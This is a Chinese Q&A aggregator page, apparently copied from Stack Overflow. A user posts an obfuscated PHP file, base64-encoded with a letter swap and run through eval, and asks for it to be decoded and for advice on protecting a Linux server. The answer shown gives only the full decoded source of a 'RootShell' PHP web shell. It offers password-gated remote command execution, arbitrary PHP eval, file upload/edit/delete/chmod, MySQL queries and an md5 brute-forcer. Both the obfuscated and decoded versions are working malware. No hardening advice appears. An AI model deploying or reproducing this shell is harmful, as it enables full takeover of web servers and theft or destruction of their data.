JyZDVyPTAgdzRkdGg9NjAwJT48dGQ+PGI+VXBsMjFkIGY0bDU8L2I+PGJyPjxmMnJtIDVuY3R5cDU9XCJtM2x0NHAxcnQvZjJybS1kMXQxXCIgMWN0NDJuPVwiIi4kbTUuIj9kNHI9Ii5yNTFscDF0aCgnLicpLiJcIiBtNXRoMmQ9XCJQT1NUXCI+DQo8NG5wM3QgdHlwNT1cImg0ZGQ1blwiIG4xbTU9XCJNQVhfRklMRV9TSVpFXCIgdjFsMzU9XCI2MDAwMDAwMDBcIiAvPjw0bnAzdCBzNHo1PW8wIG4xbTU9XCIzcGwyMWQ1ZGY0bDVcIiB0eXA1PVwiZjRsNVwiIC8+DQo8NG5wM3QgdHlwNT1cInMzYm00dFwiIHYxbDM1PVwiVXBsMjFkIEY0bDVcIiAvPg0KPC9mMnJtPjwvdGQ+PHRkPjxmMnJtIDFjdDQybj1cIiIuJG01LiJcIiBtNXRoMmQ9R0VUPjxiPkNoMW5nNSBENHI1Y3Qycnk8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgczR6NT11MCBuMW01PWQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ2gxbmc1IEQ0cjVjdDJyeVwiPjwvZjJybT48L3RkPg0KPHRyPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZjRsNTxicj48L2I+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1mNGw1IHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PTVkNHQ+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ3I1MXQ1IGY0bDVcIj48L2Yycm0+DQo8L3RkPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZDRyNWN0MnJ5PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1jcmQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PWNyNTF0NWQ0cj48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJDcjUxdDUgZDRyNWN0MnJ5XCI+PC9mMnJtPjwvdGQ+DQo8L3QxYmw1PiI7DQoNCn0NCg0KZjNuY3Q0Mm4gbDJnNG4oKQ0Kew0KIHByNG50ICI8dDFibDUgYjJyZDVyPTAgdzRkdGg9NjAwJSBoNTRnaHQ9NjAwJT48dGQgdjFsNGduPVwibTRkZGw1XCI+PGM1bnQ1cj4NCiA8ZjJybSAxY3Q0Mm49Ii5iMXM1bjFtNShfX0ZJTEVfXykuIiBtNXRoMmQ9XCJQT1NUXCI+PGI+UDFzc3cycmQ/PC9iPg0KIDw0bnAzdCB0eXA1PVwicDFzc3cycmRcIiBtMXhsNW5ndGg9XCJvYVwiIG4xbTU9XCJwMXNzXCI+PDRucDN0IHR5cDU9XCJzM2JtNHRcIiB2MWwzNT1cIkwyZzRuXCI+DQogPC9mMnJtPiI7DQp9DQpmM25jdDQybiByNWwyMWQoKQ0Kew0KIGg1MWQ1cigiTDJjMXQ0Mm46ICIuYjFzNW4xbTUoX19GSUxFX18pKTsNCn0NCmYzbmN0NDJuIGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCkNCnsNCiA0ZihmM25jdDQybl81eDRzdHMoJ3Axc3N0aHIzJykpeyAkbSA9ICJwMXNzdGhyMyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7ICRtID0gIjV4NWMiOyB9DQogNGYoZjNuY3Q0Mm5fNXg0c3RzKCdzaDVsbF81eDVjJykpeyAkbSA9ICJzaDVsbF8gNXg1YyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJ3N5c3Q1bScpKXsgJG0gPSAic3lzdDVtIjsgfQ0KIDRmKCE0c3M1dCgkbSkpIC8vTjIgbTV0aDJkIGYyM25kIDotfA0KIHsNCiAgJG0gPSAiRDRzMWJsNWQiOw0KIH0NCiByNXQzcm4oJG0pOw0KfQ0KZjNuY3Q0Mm4gNXg1YzN0NV9jMm1tMW5kKCRtNXRoMmQsJGMybW0xbmQpDQp7DQogNGYoJG01dGgyZCA9PSAicDFzc3RocjMiKQ0KIHsNCiAgcDFzc3RocjMoJGMybW0xbmQpOw0KIH0NCiANCiA1bHM1NGYoJG01dGgyZCA9PSAiNXg1YyIpDQogew0KICA1eDVjKCRjMm1tMW5kLCRyNXMzbHQpOw0KICBmMnI1MWNoKCRyNXMzbHQgMXMgJDIzdHAzdCkNCiAgew0KICAgcHI0bnQgJDIzdHAzdC4iPGJyPiI7DQogIH0NCiB9DQogDQogNWxzNTRmKCRtNXRoMmQgPT0gInNoNWxsXzV4NWMiKQ0KIHsNCiAgcHI0bnQgc2g1bGxfNXg1YygkYzJtbTFuZCk7DQogfQ0KIA0KIDVsczU0ZigkbTV0aDJkID09ICJzeXN0NW0iKQ0KIHsNCiAgc3lzdDVtKCRjMm1tMW5kKTsNCiB9DQp9DQpmM25jdDQybiBwNXJtKCRmNGw1KQ0Kew0KIDRmKGY0bDVfNXg0c3RzKCRmNGw1KSkNCiB7DQogIHI1dDNybiBzM2JzdHIoc3ByNG50ZignJTInLCBmNGw1cDVybXMoJGY0bDUpKSwgLXUpOw0KIH0NCiA1bHM1DQogew0KICByNXQzcm4gIj8/Pz8iOw0KIH0NCn0NCmYzbmN0NDJuIGc1dF9jMmwycigkZjRsNSkNCnsNCjRmKDRzX3dyNHQxYmw1KCRmNGw1KSkgeyByNXQzcm4gImdyNTVuIjt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmIDRzX3I1MWQxYmw1KCRmNGw1KSkgeyByNXQzcm4gIndoNHQ1Ijt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmICE0c19yNTFkMWJsNSgkZjRsNSkpIHsgcjV0M3JuICJyNWQiO30NCiANCn0NCmYzbmN0NDJuIHNoMndfZDRycygkd2g1cjUpDQp7DQogNGYoNXI1ZygiXmM6IixyNTFscDF0aCgkd2g1cjUpKSkNCiB7DQogJGQ0cnAxcnRzID0gNXhwbDJkNSgnXFwnLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiA1bHM1DQogew0KICRkNHJwMXJ0cyA9IDV4cGwyZDUoJy8nLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiANCiANCiANCiAkNCA9IDA7DQogJHQydDFsID0gIiI7DQogDQogZjJyNTFjaCgkZDRycDFydHMgMXMgJHAxcnQpDQogew0KICAkcCA9IDA7DQogICRwcjUgPSAiIjsNCiAgd2g0bDUoJHAgIT0gJDQpDQogIHsNCiAgICRwcjUgLj0gJGQ0cnAxcnRzWyRwXS4iLyI7DQogICAkcCsrOw0KICAgDQogIH0NCiAgJHQydDFsIC49ICI8MSBocjVmPVwiIi5iMXM1bjFtNShfX0ZJTEVfXykuIj9kNHI9Ii4kcHI1LiRwMXJ0LiJcIj4iLiRwMXJ0LiI8LzE+LyI7DQogICQ0Kys7DQogfQ0KIA0KIHI1dDNybiAiPGhhPiIuJHQydDFsLiI8L2hhPjxicj4iOw0KfQ0KcHI0bnQgJGYyMnQ1cjsNCi8vIEV4NHQ6IG0xeWI1IHc1J3I1IDRuY2wzZDVkIHMybTV3aDVyNSAxbmQgdzUgZDJuJ3QgdzFudCB0aDUgMnRoNXIgYzJkNSB0MiBtNXNzIHc0dGggMjNycyA6LSkNCjV4NHQoKTsNCj8+DQog';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

可以帮我解码文件
并告诉我如何保护服务器 linux 免受编码 shell

最佳答案

这是解码后的脚本

?><?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename('the actual path of this script');
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px; 
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px; 
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px; 
 font-weight: bold; 
 border-left-width: 1px; 
 font-size: 10px; 
 border-left-color: #33FF00; 
 background: #000000; 
 border-bottom-width: 1px; 
 border-bottom-color: #33FF00; 
 color: #33FF00; 
 border-top-color: #33FF00; 
 font-family: verdana; 
 border-right-width: 1px; 
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {

   case 'cmd': //Run command

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;


   case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";

    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }

    print "</textarea><input type=submit value=\"Save\"></form>";

   break;

   case 'delete': //Delete a file

    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }


   break;


   case 'eval': //Evaluate PHP code

    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";

    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }

   break;

   case 'chmod': //Chmod file


    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

   break;

   case 'mysql': //MySQL Query

   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];


    $result = mysql_query($sql);

   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";

   }

   break;

   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;


   case 'phpinfo': //PHP Info
    phpinfo();
   break;


   case 'rename':

    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }

    }
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }

    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;

   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {

      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }

     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }

    }

   }

   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;

   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";

   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

 $files = array();
 $directories = array();

 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']). 
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}




 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle))) 
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }

  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }

 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
function reload()
{
 header("Location: ".basename('the actual path of this script'));
}
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}

}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }



 $i = 0;
 $total = "";

 foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;

  }
  $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }

 return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

关于php - 如何保护服务器 linux 免受编码 shell,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11735549/

上一篇:c++ - C++11 中的正则表达式

下一篇:linux - 为什么自旋锁在 Linux 内核(非 SMP)中是空操作?

相关文章:

php - 将日期格式(在 DB 或输出中)更改为 dd/mm/yyyy - PHP MySQL

phpmyadmin Designer Tab 不同颜色的含义?

php - 如何将带有HTML实体和无效字符的文本转换为其等效的UTF-8?

linux - 如何重新编译 libc 以使用软 float ?

php - 停止向浏览器打印 php 错误消息

php - 如何根据php中的条件复选框回显隐藏的表单字段?

linux - 没有窗口/gui 的源代码

java - 无法将 BASE64 解码为 Selenium 2 中的图像文件

api - 如何使用 ffmpeg av_interleaved_write_frame() 写入 x264_encoder_encode() 生成的 NAL

c++ - 如何在解码 H264 流时跳过帧?

©2024 IT工具网  联系我们